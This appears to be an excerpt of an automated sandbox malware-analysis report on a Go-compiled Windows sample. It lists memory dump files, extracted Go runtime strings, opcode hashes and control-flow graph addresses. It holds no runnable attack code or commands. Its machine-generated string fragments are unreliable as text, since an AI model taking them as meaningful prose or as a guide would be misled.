                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: ), ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHa$, ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanI$, i = , not 390625<-chanAnswerArabicBitBltBrahmiCarianChakmaCommonCopticEndDocFormatGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLycianLydianMulDivRejangSCHED SaveDCStringSyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UT$, j0 = 19531259765625AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanEllipseElymaicEndPageFillRgnFreeSidGODEBUGGranthaHanunooIO waitIsChildKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSetMenuSetRectSharadaShavianSiddhamSinhalaSleepExSogdianS$, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCM_Get_DevNode_StatusCentral Standard TimeChangeServiceConfig2WDeregisterEventSourceDwmGetWi$, npages = /dev/stderr/dev/stdout30517578125: frame.sp=ClassHESIODCloseHandleCoGetObjectCreateFileWDeleteFileWDestroyIconDestroyMenuDives_AkuruDrawMenuBarDrawTextExWEnumWindowsExitProcessFindWindowWFreeLibraryGOTRACEBACKGetAncestorGetCaretPosGetFileTypeGetIcon$] = (arrayclosedeferfalsefaultgFreegcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapntohspanicpop3sscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= $] = ] n=allgallpavx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchttpicmpidleigmpint8itabkindpipepop3profrootsbrksmtpsse3tcp4trueudp4uint ... MB, and cnt= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-$][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinf$bad summary databad symbol tablecastogscanstatuscontext canceledgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapnewmHandoff.lockno route to hostnon-$runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong$runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = semacquire not on the G stackstring concatenation too longsyntax error scanning boolea$runtime: npages = runtime: range = {runtime: textAddr streams pipe errorsystem page size (tracebackancestorsuse of closed filevalue out of rangewglUseFontBitmapsW [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=1490116119384765625745$runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaning bytes failed with errno= to unused region of span2910383045673370361328125AUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironm$runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewglGetProcAddresswrong medium type but memory size because dotdotdot in$~~j
                      • API String ID: 0-1605743319
                      • Opcode ID: dd3f9f0d31b2d4a497eac34beea0c17faab4a9fbc320958152d216ffab8cf97d
                      • Instruction ID: 89239c7b4e64edc2dc6934b596c0bd15f6d34ab1028b5829e94a1245d00b1dc9
                      • Opcode Fuzzy Hash: dd3f9f0d31b2d4a497eac34beea0c17faab4a9fbc320958152d216ffab8cf97d
                      • Instruction Fuzzy Hash: DF32A9B6718AC481DB60AF15F8413DAA726F789BC0F448126DF8D17B5ADF38D986CB04

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 247 68b020-68b029 248 68b02f-68b083 call 68cb80 247->248 249 68b690-68b6a9 call 6d9860 247->249 254 68b085-68b092 248->254 255 68b097 248->255 249->247 256 68b37c-68b386 254->256 257 68b09c-68b0c5 255->257 258 68b479-68b489 256->258 259 68b38c-68b3ad 256->259 260 68b0ee-68b108 257->260 261 68b48b-68b48e 258->261 262 68b3bd-68b3d6 259->262 263 68b3af-68b3bb 259->263 264 68b10e-68b119 260->264 265 68b2d6-68b2e8 260->265 266 68b53d-68b547 261->266 267 68b494-68b4a8 call 68b6c0 261->267 269 68b3d8-68b3da 262->269 270 68b3dc-68b40a call 695700 262->270 268 68b414-68b41a 263->268 271 68b33a-68b342 call 6dbf60 264->271 272 68b11f-68b13a 264->272 278 68b549-68b560 266->278 279 68b562-68b57b 266->279 295 68b5d9-68b5ec 267->295 296 68b4ae-68b53a call 696840 * 2 267->296 280 68b41c-68b423 268->280 281 68b465-68b477 268->281 269->268 270->268 284 68b347-68b379 271->284 276 68b13c-68b158 call 68c7a0 272->276 277 68b190-68b1a4 272->277 306 68b329-68b335 call 6b2d80 276->306 307 68b15e-68b186 276->307 282 68b318-68b324 call 6b2d80 277->282 283 68b1aa-68b1cf call 68cb80 277->283 288 68b5c0-68b5c3 278->288 290 68b58c-68b5bc 279->290 291 68b57d-68b58a 279->291 280->284 289 68b429-68b460 call 6955c0 280->289 281->261 282->306 309 68b1f0-68b207 283->309 310 68b1d1-68b1ea call 68c7a0 283->310 284->256 293 68b5fe-68b68f call 6b4520 call 6b4e20 call 6b4c80 call 6b4e20 call 6b4c80 call 6b4e20 * 2 call 6b4780 call 6b45a0 call 6b2d80 288->293 294 68b5c5-68b5cc 288->294 289->284 290->288 291->288 293->249 302 68b5ed-68b5f9 call 6b2d80 294->302 303 68b5ce-68b5d4 294->303 296->266 302->293 303->257 306->271 307->277 315 68b20d-68b219 309->315 316 68b2a6-68b2bb 309->316 310->309 328 68b307-68b313 call 6b2d80 310->328 322 68b21b 315->322 323 68b222-68b243 call 68c7a0 315->323 319 68b2bd-68b2ce 316->319 320 68b2f1 call 6dbfc0 316->320 326 68b2d4-68b2ec call 6dbf40 319->326 327 68b0c7-68b0eb 319->327 333 68b2f6-68b302 call 6b2d80 320->333 322->323 323->333 339 68b249-68b28e 323->339 326->320 327->260 328->282 333->328 341 68b290-68b299 call 6dc880 339->341 342 68b2a1 339->342 341->342 342->316
                      Strings
                      • out of memory allocating heap arena metadatareflect: funcLayout with interface receiver runtime: lfstack.push invalid packing: node=use of WriteTo with pre-connected connectioncannot send after transport endpoint shutdowncharacter string exceeds maximum length, xrefs: 0068B307
                      • !, xrefs: 0068B57D
                      • out of memory allocating allArenasreflect: Field index out of boundsreflect: Field of non-struct type reflect: string index out of rangeruntime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning wit, xrefs: 0068B2F6
                      • end outside usable address spacenumerical argument out of domainpanic while printing panic valuereflect.nameFrom: tag too long: removespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedruntime: failed to release pagesrunt, xrefs: 0068B5B1
                      • runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-nega, xrefs: 0068B617
                      • , ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanI, xrefs: 0068B632
                      • base outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack spanheapBitsSetType: unexpected shiftmin must be a non-zero power of 2misrounded allocation in sysAllocreflect.nameFrom: name too lo, xrefs: 0068B583
                      • region exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned region45474735088646411895751953125CM_Get_Device_Interface_ListWCentra, xrefs: 0068B559
                      • out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is alre, xrefs: 0068B329
                      • ) not in usable address space: ...additional frames elided....lib section in a.out corrupted11368683772161602973937988281255684341886080801486968994140625Central Brazilian Standard TimeCertDuplicateCertificateContextMountain Standard Time (Mexico)SetupDiGetDe, xrefs: 0068B64F
                      • memory reservation exceeds address space limitpanicwrap: unexpected string after type name: reflect.Value.Slice: slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base poin, xrefs: 0068B67E
                      • arena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno buffer , xrefs: 0068B318
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: !$) not in usable address space: ...additional frames elided....lib section in a.out corrupted11368683772161602973937988281255684341886080801486968994140625Central Brazilian Standard TimeCertDuplicateCertificateContextMountain Standard Time (Mexico)SetupDiGetDe$, ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanI$arena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfacemissing stack in newstackmissing traceGCSweepStartno buffer $base outside usable address spaceconcurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack spanheapBitsSetType: unexpected shiftmin must be a non-zero power of 2misrounded allocation in sysAllocreflect.nameFrom: name too lo$end outside usable address spacenumerical argument out of domainpanic while printing panic valuereflect.nameFrom: tag too long: removespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedruntime: failed to release pagesrunt$memory reservation exceeds address space limitpanicwrap: unexpected string after type name: reflect.Value.Slice: slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base poin$out of memory allocating allArenasreflect: Field index out of boundsreflect: Field of non-struct type reflect: string index out of rangeruntime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning wit$out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetraceback: unexpected SPWRITE function transport endpoint is alre$out of memory allocating heap arena metadatareflect: funcLayout with interface receiver runtime: lfstack.push invalid packing: node=use of WriteTo with pre-connected connectioncannot send after transport endpoint shutdowncharacter string exceeds maximum length$region exceeds uintptr rangeruntime.semasleep unexpectedruntime: bad lfnode address runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunreserving unaligned region45474735088646411895751953125CM_Get_Device_Interface_ListWCentra$runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangeslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingtimer period must be non-nega
                      • API String ID: 0-2302844595
                      • Opcode ID: 190ac760c7cb68a64f16627a2821d270fcc7431969160bc5e7f2f4824e39751d
                      • Instruction ID: 429af1f99667a9d127902e53ed53ccd86d14455ec2b943ece5c7dd99b945ab24
                      • Opcode Fuzzy Hash: 190ac760c7cb68a64f16627a2821d270fcc7431969160bc5e7f2f4824e39751d
                      • Instruction Fuzzy Hash: 3FE1BA72604B8482DB60AF66F4403DAA366F749B90F84522AEFEC47799DF3CD585C740
                      Strings
                      • malloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywglGetCurrentContextwirep: already in goworkbuf is not empty, xrefs: 0068C316
                      • !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 0068BE13
                      • mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in reset, xrefs: 0068C305
                      • delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough significant bits after mult128bitPow10panicwrap: unex, xrefs: 0068C2BC
                      • mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinepotentially overlapping in-use allocations detectedruntime:, xrefs: 0068C338
                      • malloc deadlockmisaligned maskmissing addressmissing mcache?ms: gomaxprocs=network is downno medium foundno such processpreempt SPWRITErecovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm, xrefs: 0068C327
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC$delayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough significant bits after mult128bitPow10panicwrap: unex$malloc deadlockmisaligned maskmissing addressmissing mcache?ms: gomaxprocs=network is downno medium foundno such processpreempt SPWRITErecovery failedruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm$malloc during signalnotetsleep not on g0p mcache not flushedpacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywglGetCurrentContextwirep: already in goworkbuf is not empty$mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewruntime: unable to acquire - semaphore out of syncfatal: systemstack called from unexpected goroutinepotentially overlapping in-use allocations detectedruntime:$mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in reset
                      • API String ID: 0-1308267341
                      • Opcode ID: bcd028a9f677ec3ca78667ff0c7571ec1f9023209dfcdd6b4cd664ebd56cb835
                      • Instruction ID: aafc7e17c1feddb260829edf5210a8f40bc84c264327f43130092a546daa41ae
                      • Opcode Fuzzy Hash: bcd028a9f677ec3ca78667ff0c7571ec1f9023209dfcdd6b4cd664ebd56cb835
                      • Instruction Fuzzy Hash: 9032E872208B80C2DB64DB15E4407AABB66F789BD4F599216EF9D07B69CF7CC845CB00
                      Strings
                      • (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanEllipseElymaicEndPageFillRgnFreeSidGODEBUGGranthaHanunooIO waitIsChildK, xrefs: 0069D626
                      • MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625AnimateWindowCertOpenStoreCoTaskMemFreeCreateActCtxW, xrefs: 0069D685
                      • +-./5<=?CLMPSUZ[\, xrefs: 0069D6A5
                      • pacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywglGetCurrentContextwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported metho, xrefs: 0069D606
                      • ->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDT, xrefs: 0069D665
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: (scan (scan) MB in Value> allocs dying= locks= m->g0= nmsys= pad1= pad2= s=nil text= zombie% CPU (, goid=, j0 = 19531259765625AvestanBengaliBrailleChanDirCopySidCypriotDeseretElbasanEllipseElymaicEndPageFillRgnFreeSidGODEBUGGranthaHanunooIO waitIsChildK$ MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625AnimateWindowCertOpenStoreCoTaskMemFreeCreateActCtxW$+-./5<=?CLMPSUZ[\$->25: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...125625???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDT$pacer: assist ratio=preempt off reason: reflect.makeFuncStubruntime: unknown pc semaRoot rotateRighttime: invalid numbertrace: out of memorywglGetCurrentContextwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not found of unexported metho
                      • API String ID: 0-276758692
                      • Opcode ID: 162c147808f1654806f8404f910aae7cd4a2c619c39510d8d77baefe221c97ac
                      • Instruction ID: 1e20b95d9d07e4763a14c00ef053280673ca910ebd5131de27a00cdb674c9a39
                      • Opcode Fuzzy Hash: 162c147808f1654806f8404f910aae7cd4a2c619c39510d8d77baefe221c97ac
                      • Instruction Fuzzy Hash: F561B172908F8085CB41EF25E44039AB7AAFB9ABC0F05D336AA4D17B26DF38D081C740
                      Strings
                      • xTh, xrefs: 00685B4F
                      • G waiting list is corruptedGdipCreateBitmapFromHBITMAPGdipCreateHBITMAPFromBitmapGetSecurityDescriptorLengthGetUserPreferredUILanguagesPdhGetFormattedCounterValueSetupDiClassNameFromGuidExWSetupDiGetDeviceInstanceIdWSetupDiGetDriverInfoDetailWStartServiceCtrlD, xrefs: 00685B2A
                      • unreachableuserenv.dlluxtheme.dllversion.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<ni, xrefs: 00685646
                      • xTh, xrefs: 006854A0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1516899247.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.1516880995.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.0000000000726000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1516956122.000000000076F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517048253.00000000007D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517065056.00000000007DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517080484.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517094338.00000000007DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.00000000007EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.000000000081D000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517111755.0000000000847000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.000000000084A000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517177249.0000000000872000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517247479.0000000000906000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1517263502.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
